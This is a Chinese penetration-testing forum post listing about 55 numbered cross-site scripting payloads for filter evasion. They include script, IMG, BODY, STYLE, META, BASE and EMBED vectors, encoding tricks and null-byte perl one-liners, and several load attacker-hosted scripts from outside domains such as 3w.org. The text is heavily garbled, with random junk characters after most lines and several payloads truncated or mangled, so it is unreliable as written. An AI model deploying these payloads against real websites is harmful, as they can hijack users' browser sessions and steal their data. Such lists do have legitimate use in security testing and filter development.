中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]
作者: admin    时间: 2016-4-28 10:06
标题: XSS攻击汇总
(1)普通的XSS JavaScript注入4 p8 r7 l4 _4 x3 H$ v7 N$ J7 b
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>9 U$ c, X& k$ i# S) d8 X, w/ l
(99)另类弹框
" x" \; a/ I! Q! s8 L2 i' l<q/oncut=alert()>1
" Y& R' |. h8 ~7 E  L<s/onclick=alert()>b: f; g& B# ^0 V" u! O5 o( l
<XSS=" onclick="alert(1)//">clickme</SSX=">+ \: G4 i$ @0 l
<zzz onclick=alert`1`>clickme</zzz> + ]* l& `2 B& I2 h' v- s
<a onclick=alert`1`>clickme</a>
2 o! L& b: Y( X  G' ]4 h& i; k<a=">clickme</a=">! {6 [( ?7 M' ?
<a=">clickme</a>
8 v3 O3 J: o& U' H* B<z=">clickme</z=">
$ R( E8 V5 B( w0 {  o5 |<z onclick=alert`1`>clickme</z>
8 w0 D" o8 k0 }* x$ E! y) T' n
: n9 w# M) W( @(2)IMG标签XSS使用JavaScript命令' S0 ~- Y* Y) K
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ h$ q- W' y; t+ j  ^1 v$ H1 l: C1 k* O  z) Y9 ~
(3)IMG标签无分号无引号- v/ V7 q3 G/ _) n
<IMG SRC=javascript:alert(‘XSS’)>+ d. U( ]4 h9 d! _' g
* j8 h$ x" `, Q
(4)IMG标签大小写不敏感3 G& U* k. ]' I1 L7 q
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>; {, u- a% r) l! {

, T0 j* \, l) y% L: _(5)HTML编码(必须有分号)
- B" m7 Q6 U; R, h) M; g<IMG SRC=javascript:alert(“XSS”)># ]/ o3 x# o6 r) m, t' f) D* j! u

- [4 y- G0 ]. X3 s( ]  r(6)修正缺陷IMG标签
7 m, _# i1 u  s. g3 m! d<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
5 X" P0 @. R5 U. Q6 Y4 J( B6 Y" y& o9 o) c& P. K
(7)formCharCode标签(计算器)" [! x7 Z; o' K$ P7 H7 k
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>( U' p$ w( _2 {1 n, o3 ?7 s
; Y# S5 B9 V6 y5 M8 R  @
(8)UTF-8的Unicode编码(计算器): d+ T: Z& ?7 R- ?7 m
<IMG SRC=jav..省略..S')>
4 T! w6 v- T: |) [! D
9 m1 W& J2 B# `. N(9)7位的UTF-8的Unicode编码是没有分号的(计算器)9 D9 P7 y) ?% O  ^0 J# I
<IMG SRC=jav..省略..S')>
: a4 ^( I* \) W; s7 _, z7 q/ o8 I$ R) c, W# ?. @" V1 n+ w
(10)十六进制编码也是没有分号(计算器): ^3 a9 q; d( N, u2 f& V+ ]6 ^9 _" U
<IMG SRC=\'#\'" /span>
+ F. x1 I3 _" \9 {  }8 k4 R$ A
( o" E4 S8 C: @. T' A. c" g8 M(11)嵌入式标签,将Javascript分开
8 Q/ ?1 W4 h# e  |  h1 }# d<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
: ]5 `/ T- m3 i5 b; X( N3 V7 C8 Q0 t+ e: e
(12)嵌入式编码标签,将Javascript分开
& {  m' m' @3 b8 Y5 {  P, k, q( ^<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>) p" |6 W3 V0 f" `
& D8 S6 U7 U  j3 d, f# m
(13)嵌入式换行符
( f: {! g: |  i/ @$ U0 r/ R; E9 N<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
9 t% [8 k- K8 U' Z6 Y9 t2 R4 k( H# ^  z
(14)嵌入式回车
. P7 \6 W: Y8 K# O<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, S( U. j* t: V( a/ _

) p: v+ G: O2 |  z8 N, Q(15)嵌入式多行注入JavaScript,这是XSS极端的例子
% L0 G" L6 a3 u; X3 o% t/ L<IMG SRC=\'#\'" /span>) R5 [7 |* P* J  U$ J
: g1 _5 E1 v- o9 R
(16)解决限制字符(要求同页面)
7 s& V7 u: R2 E+ m9 V% b- D<script>z=’document.’</script>
, u1 a( l$ h3 o# i+ ^6 i  b0 d<script>z=z+’write(“‘</script>9 W! ~3 O3 R9 d7 G5 D2 `
<script>z=z+’<script’</script>
& r' T2 B9 W- B0 E  _# v2 ~<script>z=z+’ src=ht’</script>7 q% g5 I$ x. s% }% B! B
<script>z=z+’tp://ww’</script>
0 J, E& t9 I$ E) C- r+ ?) d<script>z=z+’w.shell’</script>9 Z, v  Z& f" b" Y: b# W
<script>z=z+’.net/1.’</script>8 C/ u7 e9 U( l2 o
<script>z=z+’js></sc’</script>
$ E' s! a( M5 n1 h0 k0 R" y$ R5 y! X<script>z=z+’ript>”)’</script>$ A0 T: D0 y. \6 `; I. Q( T
<script>eval_r(z)</script>
* M7 d0 {5 q- q7 J# S2 R2 @/ f! {. E  `
(17)空字符
  i4 B0 t  ]8 G, |perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
% _3 N6 J( E$ o( ~1 F
6 q! Q( ~$ Y  t' R4 e(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
* v* k% i# E9 X7 M$ ~) t. hperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out( H7 f0 w/ k) x- I' [% U, V

; S  J% e1 e" [(19)Spaces和meta前的IMG标签! h5 u8 g1 m. M, W3 K8 }
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>* {2 Q/ e$ g) Z  U
4 q4 B# F- `5 K. v' |1 X6 _$ z% T
(20)Non-alpha-non-digit XSS7 M/ r9 c$ k2 M5 X5 |: ~3 n
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
9 S1 R: L' I. o0 I2 p, H% D- ?  Y4 n4 [1 n/ P
(21)Non-alpha-non-digit XSS to 2* {2 U" |: R( d* F; O) p
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) E1 }1 K3 R% D$ _, Y  p9 R

  H4 o* }- F* y$ S2 E(22)Non-alpha-non-digit XSS to 3/ B. M, w- c+ K1 w! w
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>/ r' m0 c% i5 i$ Z. j
( w5 L2 H  B9 [# }! a' H# t
(23)双开括号
: D' d$ m/ {. k+ h) w<<SCRIPT>alert(“XSS”);//<</SCRIPT>
0 ?7 o  m( }2 x) F( {9 D5 Y
' n; p# p, Z# b3 ^- w' {  c(24)无结束脚本标记(仅火狐等浏览器)
7 E( [+ `/ M5 _/ y<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: @: t9 y; c. p6 _) K; `8 }8 `. `" W

, V: w8 E  H' W, z(25)无结束脚本标记2( G- N, k' W1 F" J# H  Q7 [
<SCRIPT SRC=//3w.org/XSS/xss.js>
) W2 }3 n( M. h& c: C& H/ d) C, M! E% D
(26)半开的HTML/JavaScript XSS
# X8 Y/ {* K4 T# }7 j<IMG SRC=\'#\'" /span>0 o  i2 Z2 X% u! T+ c
0 e, l6 E0 \  O) M  j8 O
(27)双开角括号
3 x& E5 b$ H  O/ \# u: _<iframe src=http://3w.org/XSS.html <
1 r# Y- [% o7 B7 O$ R: \9 }7 Y! b- X+ U4 D
(28)无单引号 双引号 分号
- B9 C5 x- u% t* u! C; x<SCRIPT>a=/XSS/; `% U, U4 L# ]1 n
alert(a.source)</SCRIPT>" G1 g3 i, f  ]4 B9 V" |

5 Q5 ~6 @8 l5 t3 g(29)换码过滤的JavaScript
% l$ k5 ~1 l3 S6 r( Q' M\”;alert(‘XSS’);//
$ @9 Z, c; Q! k# {
0 k4 V* E( Y+ n2 x8 N, K* r" w(30)结束Title标签
- {5 n& X2 |0 x2 R9 k</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* w  q* m  Z) o* N

; {- h% r2 n5 v& J/ e4 _1 r(31)Input Image( {6 P- K$ w, m; K( K
<INPUT SRC=\'#\'" /span>0 z5 ~1 y5 k5 e2 z) F# Z/ }
) r& l; W( w& k0 F4 W6 a
(32)BODY Image
/ N8 g0 x5 I( P) _<BODY BACKGROUND=”javascript:alert(‘XSS’)”>0 O. H! K# R9 K
" P( A7 _. v' H+ F& c
(33)BODY标签
8 R3 A+ P* m" H) [* s' g<BODY(‘XSS’)>7 B2 M3 G8 S5 ]6 p- F& `! y

( p3 i- G/ l& T& w; a# Q(34)IMG Dynsrc
) R+ J" V: O5 P" ?<IMG DYNSRC=\'#\'" /span>2 ^* O4 q+ C6 b: f! p
% P1 E! |! E1 s( h# P# s8 G
(35)IMG Lowsrc
0 O* m" S+ W7 E  I' e' R; q<IMG LOWSRC=\'#\'" /span>' ?5 S/ E' H- ]2 p5 |6 h

$ t- F) `- J% ~4 C(36)BGSOUND
5 m1 V+ [5 E3 G1 Y<BGSOUND SRC=\'#\'" /span>8 m% J9 q$ a0 l$ ~% I5 G
) s! F$ |6 F' u* {5 A  _1 e
(37)STYLE sheet
1 n9 C  S  u( U! j8 ^<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>' j7 n! Y; l/ [2 g
1 Q/ X; j) l5 G) y2 s
(38)远程样式表( Z2 R4 }) _2 O9 b' U- G: Q- n5 k, V
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>( A& ~, D* G5 E8 C: k+ l( I' z- o

9 @8 |% i0 U' W" c* {$ F+ L(39)List-style-image(列表式)
0 H, h$ S/ j2 h$ g) |1 E<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS% c. s5 i( K4 {
+ _6 c1 u3 N" L% e8 ]4 [) e
(40)IMG VBscript1 V, T; n7 m4 W' f( B$ E+ {, m) S
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS1 c* j. ~7 y' v! p7 I
" W' \% b: w+ V+ k+ h0 m! h
(41)META链接url( ~2 ^6 b* o+ W, d
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>; [3 _3 i9 X. M! V( L

" m( L' ?" g3 D' v/ v( g(42)Iframe
: K) G6 r+ ~  P+ f<IFRAME SRC=\'#\'" /IFRAME>% D1 w2 C0 p7 e* z. M" v) r

) w4 d6 Z( ?2 O- t(43)Frame# `5 G9 A5 \! m& _' R
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>( G; y+ u, ?  w0 X$ O, ?

9 C) D- |; O( D% U& _' O% v$ J(44)Table
% d% a* W! a) ^% F<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& w$ G0 ]) m, u5 i' H6 i5 o6 i* f. W7 B: @, I6 ?3 r
(45)TD& Y/ e* ]$ Y8 r; e. j; h  n
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
( s9 C3 |- [5 b4 c& b# |# |
+ h1 K( L- j( g, k! r  u(46)DIV background-image
% l9 f- P& h% D<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>0 a, S, i/ T; K  x' t7 P
2 g. o' k& a: H- c3 ^; E. b& R
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ C- |5 Q: r+ E$ ?& Z" Q<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ X! q$ E3 u. B# \0 H- i( ^7 M

' [% s4 F' s# o# b- h& C(48)DIV expression& v+ g* g" l) A8 D
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
9 f; @4 s, l/ D2 `% {9 {$ |& @6 j' x( X* a5 X8 t6 ?* k
(49)STYLE属性分拆表达1 i) {1 J. {  h, J5 l3 L
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ a: E/ c; ^( J5 L* n* P3 i$ S# J7 `- l
(50)匿名STYLE(组成:开角号和一个字母开头)+ E2 V0 D: X, Z: U% v
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 w# a$ e: \, v8 Y0 j! |' x& q

  U9 r5 F/ s' B& n: S# j3 Y(51)STYLE background-image
# _' `3 z, i9 b) Q- D<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>" O0 K' N5 V9 i2 a) @0 v) ^

7 j6 v+ T$ |  o- P(52)IMG STYLE方式. X& V* ^7 j" k/ q' ]$ [3 ~4 _
exppression(alert(“XSS”))’>' ]8 d# p8 C3 Y# k2 ?  s7 _
+ _1 u/ }- \! }& _& d7 s# u  u
(53)STYLE background% T6 U8 ]1 k+ m" c
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ E, W& M( S; Q" X! {+ Q0 P' e7 u+ l; }$ w; |" x9 o% g
(54)BASE
8 I9 o7 Z3 w/ O, _; p<BASE HREF=”javascript:alert(‘XSS’);//”>
* }, W, W9 u$ J9 {  x" {! P" a5 l5 I5 {
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ P! W6 q* N1 i2 M. f7 x<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
4 g% u+ ^" S# e1 l% E8 D: B



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2